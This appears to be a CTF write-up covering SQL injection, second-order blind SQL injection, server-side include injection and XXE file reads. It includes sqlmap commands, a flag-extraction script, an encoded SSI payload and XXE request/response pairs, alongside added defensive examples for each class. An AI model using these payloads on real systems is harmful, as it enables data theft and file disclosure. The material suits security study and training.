Summary: SimpleBBS 1. The login page throws an error
SimpleBBS
Analysis:
1. The login page throws an error.
2. Export the request from Burp and test it with sqlmap.
sqlmap -r bbs.txt --dbs
available databases [2]:
[*] bbs
[*] information_schema
sqlmap -r bbs.txt -D "bbs" --tables
Database: bbs
[7 tables]
+----------+
| admin    |
| articles |
| comments |
| flag     |
| messages |
| sections |
| users    |
+----------+
sqlmap -r bbs.txt -D "bbs" -T "flag" -C "f" --dump
# By the time of testing the flag had already been removed....
Database: bbs
Table: flag
[1 entry]
+---------+
| f       |
+---------+
| <blank> |
+---------+
SimpleBlog
Description:
SimpleBlog
Analysis:
At first I kept looking for a file inclusion so I could read the source; when none could be found I worked through the challenge properly and found that a plain second-order injection does the job. If the injected content is present, the score for answering the questions afterwards becomes 0.

import requests
import urllib.parse

flag = ""
register = 'http://210.32.4.20/register.php'
login = 'http://210.32.4.20/login.php'
answer = 'http://210.32.4.20/answer.php'
logout = 'http://210.32.4.20/logout.php'

# i: position inside the flag, j: candidate character code.
# The text "Your grades is 0" on the answer page is the boolean oracle.
for i in range(3, 50):
    for j in range(32, 126):
        print("i:", i, "j:", chr(j))
        req = requests.session()
        payload = "' or if((ascii(substr((select flag from flag)," + str(i) + ",1))=" + str(j) + "),1,0)='1' or '"
        post_answer = {'1.a': 'on'}
        # The payload is stored at registration and only reaches the query on the answer page.
        login_data = {'username': urllib.parse.quote(payload), 'password': 'zeroyu'}
        req.post(register, data=login_data)
        req.post(login, data=login_data)
        ans = req.post(answer, data=post_answer)
        if 'Your grades is 0' not in ans.text:
            f = chr(j)
            print(f)
            flag = flag + f
            print(flag)
            break
        req.get(logout)
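The SimpleBBS and SimpleBlog challenges both come down to a query assembled from a string, and SimpleBlog is the second-order variant: the username is stored safely at registration and only becomes dangerous when the answer page reads it back and concatenates it into a new query. The following added example (not part of the writeup, with a constructed in-memory sqlite schema, table and column names that are assumptions) shows that pattern next to the parameterised version, using a simple constructed `' or 1=1 or '` username so the difference is visible:

```python
import sqlite3


def make_db():
    # Constructed schema: users register (stored with a bound parameter), and a
    # separate grades table is consulted later by a second query.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users  (username TEXT PRIMARY KEY, password TEXT);
        CREATE TABLE grades (username TEXT, grade INTEGER);
        INSERT INTO grades VALUES ('alice', 100);
    """)
    return conn


def register(conn, username, password):
    # First-order safe: the value is bound, so whatever the user typed is stored verbatim.
    conn.execute("INSERT INTO users VALUES (?, ?)", (username, password))
    conn.execute("INSERT INTO grades VALUES (?, 0)", (username,))


def _stored_username(conn, username):
    row = conn.execute("SELECT username FROM users WHERE username = ?", (username,)).fetchone()
    return row[0] if row else None


def grade_vulnerable(conn, username):
    # Second-order sink: the code trusts the value because it "came from the database"
    # and builds the query by string formatting.
    stored = _stored_username(conn, username)
    sql = f"SELECT grade FROM grades WHERE username = '{stored}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def grade_fixed(conn, username):
    # Fixed: every query binds its inputs, including values read back from the database.
    stored = _stored_username(conn, username)
    row = conn.execute("SELECT grade FROM grades WHERE username = ?", (stored,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    attacker = "' or 1=1 or '"          # constructed stored payload
    register(db, attacker, "pw")
    print("vulnerable:", grade_vulnerable(db, attacker))   # another user's grade leaks
    print("fixed:     ", grade_fixed(db, attacker))        # attacker's own grade, 0
```

The detection lesson is the same as in the writeup: a stored value that makes a later page answer differently (a grade that flips, an error page) is the oracle, so reviewing every query that re-uses database content, not only the ones fed directly by request parameters, is what closes the class.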
SimpleServerInjection
Description:
SimpleServerInjection, SSI, flag in current directory
Analysis:
Knowing this is SSI and that the hint says to read the flag file, the usual payload turned out to be truncated after the # character, so encoding was used to bypass the filter.
Payload:
<!--%23include+virtual%3D"flag"+-->
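The bypass above works because the filter looks at the raw submitted string while the SSI engine sees the URL-decoded one, so `%23include` slips past a check for `#include`. The following added example (not from the writeup; the directive list and sample strings are constructed) contrasts that naive check with one that canonicalises first, and shows the more robust fix of rendering user text so it can never open a directive:

```python
import re
from urllib.parse import unquote_plus

# Constructed samples: the plain directive, the encoded form seen in the writeup, harmless text.
PLAIN = '<!--#include virtual="flag" -->'
ENCODED = '<!--%23include+virtual%3D"flag"+-->'
HARMLESS = 'Hello <b>world</b>'

# Common Apache/nginx SSI directive keywords (assumed list for the demo).
SSI_DIRECTIVE = re.compile(
    r'<!--\s*#\s*(include|exec|echo|config|set|printenv|fsize|flastmod|if|elif|else|endif)\b',
    re.IGNORECASE,
)


def naive_filter_blocks(value: str) -> bool:
    """Checks the raw input only; misses %23 because decoding happens later in the server."""
    return SSI_DIRECTIVE.search(value) is not None


def canonicalize(value: str, max_rounds: int = 3) -> str:
    """Decode until the value stops changing so the check sees what the SSI engine sees."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            return value
        value = decoded
    return value


def hardened_filter_blocks(value: str) -> bool:
    """Same pattern, applied after canonicalisation."""
    return SSI_DIRECTIVE.search(canonicalize(value)) is not None


def neutralize(value: str) -> str:
    """Preferred fix: escape angle brackets so user text cannot form '<!--#' at all."""
    return canonicalize(value).replace('<', '&lt;').replace('>', '&gt;')


if __name__ == "__main__":
    for sample in (PLAIN, ENCODED, HARMLESS):
        print(repr(sample), "naive:", naive_filter_blocks(sample),
              "hardened:", hardened_filter_blocks(sample))
    print(neutralize(ENCODED))
```

Pattern filters remain a last line of defence; the real mitigation is not to serve user-controlled content from a location where SSI is enabled (for Apache, no `Includes` option on that path) and to escape output.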
References:
https://junookyo.blogspot.com/2012/03/shtml-bypass-view-symlink-server-side.html
https://www.secpulse.com/archives/66934.html
http://xdxd.love/2015/12/09/ssi%E6%BC%8F%E6%B4%9E%E4%BB%8B%E7%BB%8D/
SimpleExtensionExplorerInjection
Description:
SimpleExtensionExplorerInjection, XXE, /flag
http://210.32.4.21:8080/www/index.html
Analysis:
1. Capturing the request in Burp shows that data is sent as JSON.
2. Change the Content-Type header to XML and try posting XML-formatted data.
The request and response show that an XXE vulnerability exists.
Request
POST /www/ HTTP/1.1
Host: 210.32.4.21:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://210.32.4.21:8080/www/index.html
Content-Type: application/xml; charset=UTF-8
Content-Length: 73
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<name>zzz</name>
<age>zzz</age>
Response
HTTP/1.1 500
Content-Type: application/json;charset=UTF-8
Date: Fri, 16 Nov 2018 09:17:40 GMT
Connection: close
Content-Length: 254

{"timestamp":"2018-11-16T09:17:40.797+0000","status":500,"error":"Internal Server Error","message":"org.xml.sax.SAXParseException; lineNumber: 3; columnNumber: 2; The markup in the document following the root element must be well-formed.","path":"/www/"}
3. Following the hint /flag, read the file directly.
Request
POST /www/ HTTP/1.1
Host: 210.32.4.21:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://210.32.4.21:8080/www/index.html
Content-Type: application/xml; charset=UTF-8
Content-Length: 151
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///flag" >]>
<root>
<name>name</name>
<age>&xxe;</age>
</root>
Response:
HTTP/1.1 200
Content-Type: text/plain;charset=UTF-8
Content-Length: 64
Date: Fri, 16 Nov 2018 09:21:23 GMT
Connection: close

Received name: name, age: EIS{bce52c116d589ae9472e59a162cc90e2}
References:
https://blog.netspi.com/playing-content-type-xxe-json-endpoints/
https://thief.one/2017/06/20/1/
SimplePrintEventLogger
Description:
SimplePrintEventLogger, same server as SimpleExtensionExploreInjection , RCE, flag in /
http://210.32.4.21:8080/www/index.html
Analysis:
This runs on the same server as the previous challenge and the flag is in the root directory, so just browse for it manually.
Request
POST /www/ HTTP/1.1
Host: 210.32.4.21:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://210.32.4.21:8080/www/index.html
Content-Type: application/xml; charset=UTF-8
Content-Length: 147
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///" >]>
<root>
<name>name</name>
<age>&xxe;</age>
</root>
Response
HTTP/1.1 200
Content-Type: text/plain;charset=UTF-8
Content-Length: 169
Date: Fri, 16 Nov 2018 16:46:04 GMT
Connection: close

Received name: name, age: .dockerenv bin boot dev docker-java-home etc flag flagvvvvvaaaagegsgag2333 home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
Read flagvvvvvaaaagegsgag2333
Request
POST /www/ HTTP/1.1
Host: 210.32.4.21:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://210.32.4.21:8080/www/index.html
Content-Type: application/xml; charset=UTF-8
Content-Length: 171
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///flagvvvvvaaaagegsgag2333" >]>
<root>
<name>name</name>
<age>&xxe;</age>
</root>
Response
HTTP/1.1 200
Content-Type: text/plain;charset=UTF-8
Content-Length: 64
Date: Fri, 16 Nov 2018 16:47:38 GMT
Connection: close

Received name: name, age: EIS{f501e9c5323c560b0a40192ce9b7ad38}
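Both XXE challenges (SimpleExtensionExplorerInjection and SimplePrintEventLogger) exploit the same two defects: the JSON endpoint let the client switch the parser by sending `Content-Type: application/xml`, and the XML parser honoured a DOCTYPE with an external entity. The following added example (not from the writeup or the target application; the request bodies are constructed to mirror the ones above and the handler is a stand-in for the real Spring endpoint) shows the two server-side checks: accept only the media type the endpoint was written for, and, if XML must be parsed, refuse any document that carries a DTD before the parser ever sees an entity reference:

```python
import json
import xml.etree.ElementTree as ET
import xml.parsers.expat

# Constructed sample bodies modelled on the requests in the writeup.
JSON_BODY = b'{"name": "zzz", "age": "zzz"}'
XXE_BODY = (b'<?xml version="1.0" encoding="UTF-8" ?>\n'
            b'<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///flag" >]>\n'
            b'<root><name>name</name><age>&xxe;</age></root>')
PLAIN_XML = b'<?xml version="1.0"?><root><name>n</name><age>1</age></root>'


def has_doctype(data: bytes) -> bool:
    """Detect a DOCTYPE with expat's DTD callback instead of a regex.

    No ExternalEntityRefHandler is registered, so expat never fetches the
    SYSTEM identifier; the callback fires before any entity reference is reached.
    """
    seen = []
    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = (
        lambda name, sysid, pubid, has_internal: seen.append(name)
    )
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError:
        pass  # malformed input is the caller's problem; we only report whether a DTD appeared
    return bool(seen)


def parse_xml_strict(data: bytes) -> dict:
    """Parse XML only after confirming it declares no DTD at all."""
    if has_doctype(data):
        raise ValueError("DOCTYPE/DTD is not allowed in client-supplied XML")
    root = ET.fromstring(data)
    return {child.tag: child.text for child in root}


def handle_request(content_type: str, body: bytes) -> dict:
    """Stand-in for the /www/ endpoint: only the JSON it was designed for is accepted."""
    media_type = content_type.split(";")[0].strip().lower()
    if media_type != "application/json":
        # The writeup's attack starts by switching this header; a 415 stops it here.
        return {"status": 415, "error": "Unsupported Media Type"}
    try:
        data = json.loads(body)
    except ValueError:
        return {"status": 400, "error": "Bad Request"}
    return {"status": 200, "name": data.get("name"), "age": data.get("age")}


if __name__ == "__main__":
    print(handle_request("application/json", JSON_BODY))
    print(handle_request("application/xml; charset=UTF-8", XXE_BODY))
    print(parse_xml_strict(PLAIN_XML))
    try:
        parse_xml_strict(XXE_BODY)
    except ValueError as exc:
        print("rejected:", exc)
```

For the Java stack the responses reveal, the equivalent of `has_doctype` is setting the `http://apache.org/xml/features/disallow-doctype-decl` feature to true on the SAX/DOM factory; the media-type gate belongs in the framework's content negotiation so that a JSON controller never wires up an XML converter at all. A 500 carrying a `SAXParseException` on a JSON endpoint, as in the first response above, is also a cheap detection signal for this probing.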